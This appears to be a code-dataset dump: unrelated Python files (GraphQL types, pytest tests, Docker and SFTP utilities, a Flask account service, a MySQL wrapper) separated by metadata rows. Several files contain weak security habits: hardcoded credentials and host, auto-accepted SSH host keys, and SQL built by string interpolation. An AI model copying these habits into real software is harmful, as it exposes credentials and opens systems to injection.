        ast_node: typing.Optional[ObjectTypeDefinitionNode] = None,
        extension_ast_nodes: typing.Optional[typing.Collection[ObjectTypeExtensionNode]] = None,
        sqla_model=None,
    ) -> None:
        # Forward everything except sqla_model to GraphQLObjectType.
        super().__init__(
            name=name,
            fields=fields,
            interfaces=interfaces,
            is_type_of=is_type_of,
            extensions=extensions,
            description=description,
            ast_node=ast_node,
            extension_ast_nodes=extension_ast_nodes,
        )
        self.sqla_model = sqla_model
class ConnectionType(ObjectType):
    """Marker subclass for connection (paginated list) object types."""
    pass


class EdgeType(ObjectType):
    """Marker subclass for edge object types within a connection."""
    pass


class TableType(ObjectType):
    """Marker subclass for object types generated from a table."""
    pass


class CompositeType(ObjectType, HasSQLAComposite):
    """Marker subclass for object types generated from a SQLA composite."""
    pass


class MutationPayloadType(ObjectType):
    """Base marker for mutation result payload types."""
    pass


class CreatePayloadType(MutationPayloadType):
    """Payload type for create mutations."""
    pass


class UpdatePayloadType(MutationPayloadType):
    """Payload type for update mutations."""
    pass


class DeletePayloadType(MutationPayloadType):
    """Payload type for delete mutations."""
    pass


class FunctionPayloadType(MutationPayloadType, HasSQLFunction):
    """Payload type for mutations backed by a SQL function."""
    pass
class InputObjectType(GraphQLInputObjectType, HasSQLAModel):
    """GraphQLInputObjectType that also remembers the SQLAlchemy model
    (`sqla_model`) it was generated from."""

    def __init__(
        self,
        name: str,
        fields: Thunk[GraphQLInputFieldMap],
        description: typing.Optional[str] = None,
        out_type: typing.Optional[GraphQLInputFieldOutType] = None,
        extensions: typing.Optional[typing.Dict[str, typing.Any]] = None,
        ast_node: typing.Optional[InputObjectTypeDefinitionNode] = None,
        extension_ast_nodes: typing.Optional[typing.Collection[InputObjectTypeExtensionNode]] = None,
        sqla_model=None,
    ) -> None:
        # Forward everything except sqla_model to GraphQLInputObjectType.
        super().__init__(
            name=name,
            fields=fields,
            description=description,
            out_type=out_type,
            extensions=extensions,
            ast_node=ast_node,
            extension_ast_nodes=extension_ast_nodes,
        )
        self.sqla_model = sqla_model
class CreateInputType(InputObjectType):
    """Input type for create mutations."""
    pass


class TableInputType(InputObjectType):
    """Input type generated from a table."""
    pass


class UpdateInputType(InputObjectType):
    """Input type for update mutations."""
    pass


class DeleteInputType(InputObjectType):
    """Input type for delete mutations."""
    pass
class FunctionInputType(GraphQLInputObjectType):
    """GraphQLInputObjectType that also remembers the SQL function
    (`sql_function`) it was generated from."""

    def __init__(
        self,
        name: str,
        fields: Thunk[GraphQLInputFieldMap],
        description: typing.Optional[str] = None,
        out_type: typing.Optional[GraphQLInputFieldOutType] = None,
        extensions: typing.Optional[typing.Dict[str, typing.Any]] = None,
        ast_node: typing.Optional[InputObjectTypeDefinitionNode] = None,
        extension_ast_nodes: typing.Optional[typing.Collection[InputObjectTypeExtensionNode]] = None,
        sql_function=None,
    ) -> None:
        # Forward everything except sql_function to GraphQLInputObjectType.
        super().__init__(
            name=name,
            fields=fields,
            description=description,
            out_type=out_type,
            extensions=extensions,
            ast_node=ast_node,
            extension_ast_nodes=extension_ast_nodes,
        )
        self.sql_function = sql_function
| 25.965
| 101
| 0.706913
| 457
| 5,193
| 7.868709
| 0.26477
| 0.062291
| 0.042547
| 0.017519
| 0.385984
| 0.371246
| 0.362347
| 0.342325
| 0.313404
| 0.313404
| 0
| 0
| 0.220104
| 5,193
| 199
| 102
| 26.095477
| 0.887901
| 0.044676
| 0
| 0.43871
| 0
| 0
| 0.004036
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019355
| false
| 0.083871
| 0.051613
| 0
| 0.212903
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
131342de18ae50cff3d8d09f0b5c640ef367d9c5
| 997
|
py
|
Python
|
tests/test_dcd_api.py
|
sadamek/pyIMX
|
52af15e656b400f0812f16cf31d9bf6edbe631ad
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_dcd_api.py
|
sadamek/pyIMX
|
52af15e656b400f0812f16cf31d9bf6edbe631ad
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_dcd_api.py
|
sadamek/pyIMX
|
52af15e656b400f0812f16cf31d9bf6edbe631ad
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) 2017-2018 Martin Olejar
#
# SPDX-License-Identifier: BSD-3-Clause
# The BSD-3-Clause license for this file can be found in the LICENSE file included with this distribution
# or at https://spdx.org/licenses/BSD-3-Clause.html#licenseText
import os
import pytest
from imx import img
# Used Directories — fixtures live next to this test file under ./data.
DATA_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'data')

# Test Files: the same DCD content in textual and binary form.
DCD_TXT = os.path.join(DATA_DIR, 'dcd_test.txt')
DCD_BIN = os.path.join(DATA_DIR, 'dcd_test.bin')
def setup_module(module):
    """Module-level pytest setup hook; no test environment preparation is needed."""
def teardown_module(module):
    """Module-level pytest teardown hook; no test environment cleanup is needed."""
def test_txt_parser():
    """The text-format DCD fixture parses into a 12-command segment."""
    with open(DCD_TXT, 'r') as dcd_file:
        source = dcd_file.read()
    dcd_obj = img.SegDCD.parse_txt(source)
    assert dcd_obj is not None
    assert len(dcd_obj) == 12
def test_bin_parser():
    """The binary-format DCD fixture parses into a 12-command segment."""
    with open(DCD_BIN, 'rb') as dcd_file:
        raw = dcd_file.read()
    dcd_obj = img.SegDCD.parse(raw)
    assert dcd_obj is not None
    assert len(dcd_obj) == 12
| 22.155556
| 105
| 0.691073
| 162
| 997
| 4.092593
| 0.450617
| 0.054299
| 0.045249
| 0.042232
| 0.271493
| 0.271493
| 0.271493
| 0.129713
| 0.129713
| 0.129713
| 0
| 0.01875
| 0.197593
| 997
| 44
| 106
| 22.659091
| 0.81
| 0.316951
| 0
| 0.3
| 0
| 0
| 0.046269
| 0
| 0
| 0
| 0
| 0
| 0.2
| 1
| 0.2
| false
| 0.1
| 0.15
| 0
| 0.35
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
1335675a9f3e2654ba5bacc0a704284147b3d912
| 2,518
|
py
|
Python
|
tests/test_get_set.py
|
snoopyjc/ssf
|
b995cae0e90d38e3758d4944fb144831f9bae0a5
|
[
"Apache-2.0"
] | 3
|
2020-10-07T18:28:12.000Z
|
2020-10-09T15:24:53.000Z
|
tests/test_get_set.py
|
snoopyjc/ssf
|
b995cae0e90d38e3758d4944fb144831f9bae0a5
|
[
"Apache-2.0"
] | 15
|
2020-10-09T15:23:03.000Z
|
2020-10-29T04:34:17.000Z
|
tests/test_get_set.py
|
snoopyjc/ssf
|
b995cae0e90d38e3758d4944fb144831f9bae0a5
|
[
"Apache-2.0"
] | null | null | null |
from ssf import SSF
ssf = SSF(errors='raise')
def test_get_set_days():
    """Round-trip the day-name table: read defaults, install custom names,
    and check both formatting output and input validation."""
    # Default day names: (abbreviated, full) pairs Mon..Sun.
    day_names = ssf.get_day_names()
    assert isinstance(day_names, tuple)
    assert day_names == (('Mon', 'Monday'),
                         ('Tue', 'Tuesday'),
                         ('Wed', 'Wednesday'),
                         ('Thu', 'Thursday'),
                         ('Fri', 'Friday'),
                         ('Sat', 'Saturday'),
                         ('Sun', 'Sunday'))
    # A mix of lists and tuples is accepted when installing new names.
    ssf.set_day_names([['MO', 'MON'],
                       ('TU', 'TUE'), ['WE', 'WED'],
                       ('TH', 'THU'), ['FR', 'FRI'],
                       ('SA', 'SAT'), ['SU', 'SUN']])
    # 10/3/2020 was a Saturday; the following dates walk through a full week.
    expected = {'10/3/2020': 'SA SAT',
                '10/4/2020': 'SU SUN',
                '10/5/2020': 'MO MON',
                '10/6/2020': 'TU TUE',
                '10/7/2020': 'WE WED',
                '10/8/2020': 'TH THU',
                '10/9/2020': 'FR FRI'}
    for date, formatted in expected.items():
        assert ssf.format('ddd dddd', date) == formatted
    # Non-sequence input and wrong-shape entries must raise ValueError.
    for bad in (2, (1, 2, 3, 4, 5, 6, 7)):
        try:
            ssf.set_day_names(bad)
            assert False  # Failed
        except ValueError:
            pass
def test_get_set_months():
    """Round-trip the month-name table: read defaults, replace December,
    and check input validation."""
    # Index 0 is None so months can be looked up 1-based.
    month_names = ssf.get_month_names()
    assert isinstance(month_names, tuple)
    assert month_names == (None, ('J', 'Jan', 'January'), ('F', 'Feb', 'February'), ('M', 'Mar', 'March'),
                           ('A', 'Apr', 'April'), ('M', 'May', 'May'), ('J', 'Jun', 'June'), ('J', 'Jul', 'July'),
                           ('A', 'Aug', 'August'), ('S', 'Sep', 'September'), ('O', 'Oct', 'October'),
                           ('N', 'Nov', 'November'), ('D', 'Dec', 'December'))
    # Swap out only the last entry (December) for custom spellings.
    ssf.set_month_names(month_names[:-1] + (('X', 'DE', 'DEC'),))
    assert ssf.format('mmmmm mmm mmmm', '12/3/2020') == 'X DE DEC'
    # Non-sequence input and wrong-shape entries must raise ValueError.
    for bad in (2, (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12)):
        try:
            ssf.set_month_names(bad)
            assert False  # Failed
        except ValueError:
            pass
def test_get_load_table():
    """Check the built-in format table, then load custom formats both by
    explicit index (load_table) and by auto-assignment (load)."""
    table = ssf.get_table()
    # Spot-check a few well-known built-in slots.
    builtin_slots = {0: 'General', 1: '0', 14: 'm/d/yyyy', 49: '@'}
    for index, fmt in builtin_slots.items():
        assert table[index] == fmt
    # Install two custom formats at explicit table indexes.
    ssf.load_table({104: 'yyyy-mm-dd', 105: '0.0'})
    assert ssf.format(104, '10/6/2020') == '2020-10-06'
    assert ssf.format(105, 3.4) == '3.4'
    # load() returns the existing slot for known formats ...
    assert ssf.load('0') == 1
    # ... and the first free slot for new ones.
    assert ssf.load('mmm mmmm') == 5  # Will be inserted at 5
    assert ssf.load('@') == 49
    assert ssf.format(5, '10/6/2020') == 'Oct October'
| 31.475
| 100
| 0.496029
| 349
| 2,518
| 3.501433
| 0.332378
| 0.10311
| 0.135025
| 0.10311
| 0.355155
| 0.319149
| 0.220949
| 0.209493
| 0.162029
| 0.085106
| 0
| 0.074849
| 0.278396
| 2,518
| 79
| 101
| 31.873418
| 0.597689
| 0.01946
| 0
| 0.246154
| 0
| 0
| 0.208283
| 0
| 0
| 0
| 0
| 0
| 0.4
| 1
| 0.046154
| false
| 0.061538
| 0.015385
| 0
| 0.061538
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
1368b793b823b3bd0b461ed385d6e6b6434e1e68
| 3,455
|
py
|
Python
|
scripts/dev/dockerutil.py
|
axelbarjon/mongodb-kubernetes-operator
|
13eb844c55774ce8a6de51edde1a66b4371f3ef6
|
[
"RSA-MD"
] | 1
|
2021-03-24T17:54:51.000Z
|
2021-03-24T17:54:51.000Z
|
scripts/dev/dockerutil.py
|
axelbarjon/mongodb-kubernetes-operator
|
13eb844c55774ce8a6de51edde1a66b4371f3ef6
|
[
"RSA-MD"
] | 18
|
2021-03-08T13:38:37.000Z
|
2022-02-14T15:06:28.000Z
|
scripts/dev/dockerutil.py
|
axelbarjon/mongodb-kubernetes-operator
|
13eb844c55774ce8a6de51edde1a66b4371f3ef6
|
[
"RSA-MD"
] | 1
|
2021-03-25T13:37:02.000Z
|
2021-03-25T13:37:02.000Z
|
import docker
from dockerfile_generator import render
import os
import json
from tqdm import tqdm
from typing import Union, Any, Optional
def build_image(repo_url: str, tag: str, path: str) -> None:
    """
    Build a docker image from the Dockerfile at *path* and label it *tag*.

    *repo_url* is accepted for interface compatibility; the tag alone
    identifies the built image.
    """
    docker_client = docker.from_env()
    print(f"Building image: {tag}")
    docker_client.images.build(tag=tag, path=path)
    print("Successfully built image!")
def push_image(tag: str) -> None:
    """
    Push the given tag using the current docker environment, rendering a
    progress bar from the streamed push status lines.
    """
    docker_client = docker.from_env()
    print(f"Pushing image: {tag}")
    with tqdm(total=100, ascii=False) as progress_bar:
        previous_percent = 0.0
        for status_line in docker_client.images.push(tag, stream=True):
            current_percent = get_completion_percentage(status_line)
            if current_percent:
                # Advance the bar only by the delta since the last update.
                progress_bar.update(current_percent - previous_percent)
                previous_percent = current_percent
def retag_image(
    old_repo_url: str,
    new_repo_url: str,
    old_tag: str,
    new_tag: str,
    path: str,
    labels: Optional[dict] = None,
    username: Optional[str] = None,
    password: Optional[str] = None,
    registry: Optional[str] = None,
) -> None:
    """
    Rebuild old_repo_url:old_tag under new_repo_url:new_tag (optionally adding
    labels), and push it unless the new repo:tag pair already exists upstream.

    A throwaway single-line Dockerfile (FROM old image) is written to *path*,
    built, and removed again. If username/password/registry are all provided,
    the docker client logs in before building.

    NOTE(review): the image is always rebuilt locally even when the push is
    later skipped — presumably cheap since the build is a plain FROM; confirm.
    """
    # Write a minimal Dockerfile that simply re-bases the old image.
    with open(f"{path}/Dockerfile", "w") as f:
        f.write(f"FROM {old_repo_url}:{old_tag}")
    client = docker.from_env()
    # Only authenticate when a complete credential triple was supplied.
    if all(value is not None for value in [username, password, registry]):
        client.login(username=username, password=password, registry=registry)
    image, _ = client.images.build(path=f"{path}", labels=labels, tag=new_tag)
    image.tag(new_repo_url, new_tag)
    # The generated Dockerfile is no longer needed once the build succeeded.
    os.remove(f"{path}/Dockerfile")
    # We do not want to republish an image that has not changed, so we check if the new
    # pair repo:tag already exists.
    try:
        image = client.images.pull(new_repo_url, new_tag)
        return
    # We also need to catch APIError as if the image has been recently deleted (uncommon, but might happen?)
    # we will get this kind of error:
    # docker.errors.APIError: 500 Server Error: Internal Server Error
    # ("unknown: Tag <tag> was deleted or has expired. To pull, revive via time machine"
    except (docker.errors.ImageNotFound, docker.errors.APIError) as e:
        # Pull failed -> the tag is absent upstream; fall through and push it.
        pass
    print(f"Pushing to {new_repo_url}:{new_tag}")
    client.images.push(new_repo_url, new_tag)
def get_completion_percentage(line: Any) -> float:
    """
    Parse one docker-push status line and return its completion percentage.

    :param line: a raw status line from ``client.images.push(..., stream=True)``,
                 JSON encoded as bytes or str.
    :return: percentage in [0.0, 100.0]; 0.0 for lines carrying no usable
             progress information (non-JSON input, non-"Pushing" statuses,
             missing or zero progress totals).
    """
    # Fix: accept both bytes (what docker-py streams) and str; the original
    # unconditionally called .decode() and crashed on str input.
    if isinstance(line, (bytes, bytearray)):
        try:
            line = line.decode("utf-8")
        except UnicodeDecodeError:
            return 0.0
    try:
        payload = json.loads(line.strip())
    except (ValueError, TypeError):
        return 0.0
    # Only "Pushing" lines carry byte-level progress; skipped statuses
    # ("Preparing", "Waiting", "Layer already exists") and anything else
    # count as no progress. Fix: guard against non-dict JSON payloads.
    if not isinstance(payload, dict) or payload.get("status") != "Pushing":
        return 0.0
    try:
        current = float(payload["progressDetail"]["current"])
        total = float(payload["progressDetail"]["total"])
    except (KeyError, TypeError, ValueError):
        return 0.0
    if total <= 0:
        # Fix: a zero total previously raised ZeroDivisionError.
        return 0.0
    # "current" can transiently exceed "total"; clamp at 100%.
    return min((current / total) * 100.0, 100.0)
def build_and_push_image(repo_url: str, tag: str, path: str, image_type: str) -> None:
    """
    Render the Dockerfile for *image_type*, build the image at *path*,
    remove the generated Dockerfile, and push the resulting tag.
    """
    dockerfile_path = f"{path}/Dockerfile"
    with open(dockerfile_path, "w") as dockerfile:
        dockerfile.write(render(image_type, ["."]))
    build_image(repo_url, tag, path)
    # The rendered Dockerfile is only needed for the build step.
    os.remove(dockerfile_path)
    push_image(tag)
| 32.28972
| 108
| 0.636758
| 473
| 3,455
| 4.528541
| 0.312896
| 0.03268
| 0.023343
| 0.024276
| 0.143324
| 0.080299
| 0.056956
| 0.056956
| 0.030812
| 0.030812
| 0
| 0.009292
| 0.252388
| 3,455
| 106
| 109
| 32.59434
| 0.819977
| 0.176845
| 0
| 0.189189
| 0
| 0
| 0.112388
| 0.017235
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067568
| false
| 0.054054
| 0.081081
| 0
| 0.243243
| 0.054054
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
138b01aa9774bbead45a8dac1264c5149cf9f912
| 568
|
py
|
Python
|
Section 20/2.Document-transfer_files.py
|
airbornum/-Complete-Python-Scripting-for-Automation
|
bc053444f8786259086269ca1713bdb10144dd74
|
[
"MIT"
] | 18
|
2020-04-13T03:14:06.000Z
|
2022-03-09T18:54:41.000Z
|
Section 20/2.Document-transfer_files.py
|
airbornum/-Complete-Python-Scripting-for-Automation
|
bc053444f8786259086269ca1713bdb10144dd74
|
[
"MIT"
] | null | null | null |
Section 20/2.Document-transfer_files.py
|
airbornum/-Complete-Python-Scripting-for-Automation
|
bc053444f8786259086269ca1713bdb10144dd74
|
[
"MIT"
] | 22
|
2020-04-29T21:12:42.000Z
|
2022-03-17T18:19:54.000Z
|
# Demo: transfer a file to a remote EC2 host over SFTP using paramiko.
import paramiko
ssh = paramiko.SSHClient()
# Auto-accept unknown host keys (convenient for a demo; insecure in production).
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# NOTE(review): credentials are hard-coded — acceptable for a tutorial script,
# but move them to environment variables or an SSH key for real use.
ssh.connect(hostname='54.165.97.91',username='ec2-user',password='paramiko123',port=22)
# Open an SFTP session on top of the SSH transport.
sftp_client=ssh.open_sftp()
#sftp_client.get('/home/ec2-user/paramiko_download.txt','paramiko_downloaded_file.txt')
#sftp_client.chdir("/home/ec2-user")
#print(sftp_client.getcwd())
#sftp_client.get('demo.txt','C:\\Users\\Automation\\Desktop\\download_file.txt')
# Upload this script into the remote user's home directory.
sftp_client.put("transfer_files.py",'/home/ec2-user/transfer_files.py')
sftp_client.close()
ssh.close()
| 43.692308
| 88
| 0.769366
| 84
| 568
| 4.988095
| 0.535714
| 0.167064
| 0.078759
| 0.081146
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.033272
| 0.047535
| 568
| 13
| 89
| 43.692308
| 0.74122
| 0.399648
| 0
| 0
| 0
| 0
| 0.245399
| 0.09816
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.125
| 0.125
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
139af14f3890b6a5fdebd9bc833f815258ac26c3
| 1,433
|
py
|
Python
|
tests/adv/test_pop_sfrd.py
|
jlashner/ares
|
6df2b676ded6bd59082a531641cb1dadd475c8a8
|
[
"MIT"
] | 10
|
2020-03-26T01:08:10.000Z
|
2021-12-04T13:02:10.000Z
|
tests/adv/test_pop_sfrd.py
|
jlashner/ares
|
6df2b676ded6bd59082a531641cb1dadd475c8a8
|
[
"MIT"
] | 25
|
2020-06-08T14:52:28.000Z
|
2022-03-08T02:30:54.000Z
|
tests/adv/test_pop_sfrd.py
|
jlashner/ares
|
6df2b676ded6bd59082a531641cb1dadd475c8a8
|
[
"MIT"
] | 8
|
2020-03-24T14:11:25.000Z
|
2021-11-06T06:32:59.000Z
|
"""
test_pop_models.py
Author: Jordan Mirocha
Affiliation: UCLA
Created on: Fri Jul 15 15:23:11 PDT 2016
Description:
"""
import ares
import matplotlib.pyplot as pl
PB = ares.util.ParameterBundle
def test():
    """Build an fcoll-based population, mirror its SFRD through the
    sfrd-func machinery with a toy SED, and verify both populations
    report an identical SFRD."""
    # Create a simple fcoll-based galaxy population.
    fcoll_pars = PB('pop:fcoll') + PB('sed:bpass')
    pop_fcoll = ares.populations.GalaxyPopulation(**fcoll_pars)
    #pop_fcoll_XR = ares.populations.GalaxyPopulation(**pars_1)

    # Mimic the above population to check our different SFRD/SED techniques.
    sfrd_pars = {'pop_sfr_model': 'sfrd-func',
                 'pop_sfrd': pop_fcoll.SFRD,
                 'pop_sfrd_units': 'internal'}

    sed = PB('sed:toy')
    sed['pop_Nion'] = pop_fcoll.src.Nion
    sed['pop_Nlw'] = pop_fcoll.src.Nlw
    # pop_Ex?
    sed['pop_ion_src_igm'] = False
    sed['pop_heat_src_igm'] = False

    mirror_pars = sed + sfrd_pars
    pop_sfrd = ares.populations.GalaxyPopulation(**mirror_pars)

    assert pop_fcoll.SFRD(20.) == pop_sfrd.SFRD(20.), "Error in SFRD."

    # Check the emissivities too
    #print(pop_fcoll.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6))
    #print(pop_sfrd.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6))
    #assert pop_fcoll.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6) \
    #    == pop_sfrd.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6), \
    #    "Error in photon luminosity density."

if __name__ == '__main__':
    test()
| 25.589286
| 75
| 0.669923
| 203
| 1,433
| 4.502463
| 0.413793
| 0.078775
| 0.04814
| 0.135667
| 0.282276
| 0.203501
| 0.203501
| 0.203501
| 0.203501
| 0.203501
| 0
| 0.046007
| 0.196092
| 1,433
| 55
| 76
| 26.054545
| 0.747396
| 0.432659
| 0
| 0
| 0
| 0
| 0.183081
| 0
| 0
| 0
| 0
| 0
| 0.052632
| 1
| 0.052632
| false
| 0.052632
| 0.105263
| 0
| 0.157895
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
139bcb633d3c2b224334dad0ddfc97013f3a8ff8
| 918
|
py
|
Python
|
tests/test_app/rest_app/rest_app/services/account_service.py
|
jadbin/guniflask
|
36253a962c056abf34884263c6919b02b921ad9c
|
[
"MIT"
] | 12
|
2018-09-06T06:14:59.000Z
|
2021-04-18T06:30:44.000Z
|
tests/test_app/rest_app/rest_app/services/account_service.py
|
jadbin/guniflask
|
36253a962c056abf34884263c6919b02b921ad9c
|
[
"MIT"
] | null | null | null |
tests/test_app/rest_app/rest_app/services/account_service.py
|
jadbin/guniflask
|
36253a962c056abf34884263c6919b02b921ad9c
|
[
"MIT"
] | 2
|
2019-09-08T22:01:26.000Z
|
2020-08-03T07:23:29.000Z
|
from flask import abort
from guniflask.context import service
from ..config.jwt_config import jwt_manager
@service
class AccountService:
    """Minimal in-memory account service for the test application."""

    # username -> {'authorities': [...], 'password': '...'}
    accounts = {
        'root': {
            'authorities': ['role_admin'],
            'password': '123456',
        }
    }

    def login(self, username: str, password: str):
        """Validate credentials and issue a JWT access token; abort(403) on failure."""
        account = self.accounts.get(username)
        if account is None or account['password'] != password:
            return abort(403)
        token = jwt_manager.create_access_token(authorities=account['authorities'], username=username)
        return {
            'username': username,
            'access_token': token,
        }

    def get(self, username: str):
        """Return public info for a known account; abort(404) for unknown users."""
        if username not in self.accounts:
            return abort(404)
        return {
            'username': username,
            'authorities': self.accounts[username]['authorities']
        }
| 27.818182
| 102
| 0.59695
| 91
| 918
| 5.945055
| 0.395604
| 0.110906
| 0.110906
| 0.05915
| 0.110906
| 0.110906
| 0.110906
| 0
| 0
| 0
| 0
| 0.018576
| 0.296296
| 918
| 32
| 103
| 28.6875
| 0.818885
| 0
| 0
| 0.148148
| 0
| 0
| 0.117647
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074074
| false
| 0.111111
| 0.111111
| 0
| 0.407407
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
13a92427a8cdec440aec42402a7483f2303b73a6
| 10,075
|
py
|
Python
|
json_to_relation/mysqldb.py
|
paepcke/json_to_relation
|
acfa58d540f8f51d1d913d0c173ee3ded1b6c2a9
|
[
"BSD-3-Clause"
] | 4
|
2015-10-10T19:09:49.000Z
|
2021-09-02T00:58:06.000Z
|
json_to_relation/mysqldb.py
|
paepcke/json_to_relation
|
acfa58d540f8f51d1d913d0c173ee3ded1b6c2a9
|
[
"BSD-3-Clause"
] | null | null | null |
json_to_relation/mysqldb.py
|
paepcke/json_to_relation
|
acfa58d540f8f51d1d913d0c173ee3ded1b6c2a9
|
[
"BSD-3-Clause"
] | 8
|
2015-05-16T14:33:33.000Z
|
2019-10-24T08:56:25.000Z
|
# Copyright (c) 2014, Stanford University
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
Created on Sep 24, 2013
@author: paepcke
Modifications:
- Dec 30, 2013: Added closing of connection to close() method
'''
import re
import subprocess
import tempfile
import pymysql
#import MySQLdb
class MySQLDB(object):
    '''
    Shallow interface to MySQL databases. Some niceties nonetheless.
    The query() method is an iterator. So::
        for result in mySqlObj.query('SELECT * FROM foo'):
            print(result)
    '''

    def __init__(self, host='127.0.0.1', port=3306, user='root', passwd='', db='mysql'):
        '''
        Open a connection to the given MySQL server.

        :param host: MySQL host
        :type host: string
        :param port: MySQL host's port
        :type port: int
        :param user: user to log in as
        :type user: string
        :param passwd: password to use for given user
        :type passwd: string
        :param db: database to connect to within server
        :type db: string
        :raise ValueError: if the server cannot be reached.
        '''
        # If all arguments are set to None, we are unittesting:
        if all(arg is None for arg in (host, port, user, passwd, db)):
            return
        self.user = user
        self.pwd = passwd
        self.db = db
        self.cursors = []
        try:
            self.connection = pymysql.connect(host=host, port=port, user=user, passwd=passwd, db=db)
        except pymysql.OperationalError:
            # Mask the password in the surfaced error message.
            pwd = '...............' if len(passwd) > 0 else '<no password>'
            raise ValueError('Cannot reach MySQL server with host:%s, port:%s, user:%s, pwd:%s, db:%s' %
                             (host, port, user, pwd, db))

    def close(self):
        '''
        Close all cursors that are currently still open, then the connection.
        '''
        for cursor in self.cursors:
            try:
                cursor.close()
            except Exception:
                # Fix: narrowed from a bare except; cursor may already be closed.
                pass
        try:
            self.connection.close()
        except Exception:
            pass

    def createTable(self, tableName, schema):
        '''
        Create new table, given its name, and schema.
        The schema is a dict mapping column names to
        column types. Example: {'col1' : 'INT', 'col2' : 'TEXT'}

        :param tableName: name of new table
        :type tableName: String
        :param schema: dictionary mapping column names to column types
        :type schema: Dict<String,String>
        '''
        colSpec = ''
        for colName, colVal in schema.items():
            colSpec += str(colName) + ' ' + str(colVal) + ','
        cmd = 'CREATE TABLE IF NOT EXISTS %s (%s) ' % (tableName, colSpec[:-1])
        cursor = self.connection.cursor()
        try:
            cursor.execute(cmd)
            self.connection.commit()
        finally:
            cursor.close()

    def dropTable(self, tableName):
        '''
        Delete table safely. No errors

        :param tableName: name of table
        :type tableName: String
        '''
        cursor = self.connection.cursor()
        try:
            cursor.execute('DROP TABLE IF EXISTS %s' % tableName)
            self.connection.commit()
        finally:
            cursor.close()

    def truncateTable(self, tableName):
        '''
        Delete all table rows. No errors

        :param tableName: name of table
        :type tableName: String
        '''
        cursor = self.connection.cursor()
        try:
            cursor.execute('TRUNCATE TABLE %s' % tableName)
            self.connection.commit()
        finally:
            cursor.close()

    def insert(self, tblName, colnameValueDict):
        '''
        Given a dictionary mapping column names to column values,
        insert the data into a specified table

        :param tblName: name of table to insert into
        :type tblName: String
        :param colnameValueDict: mapping of column name to column value
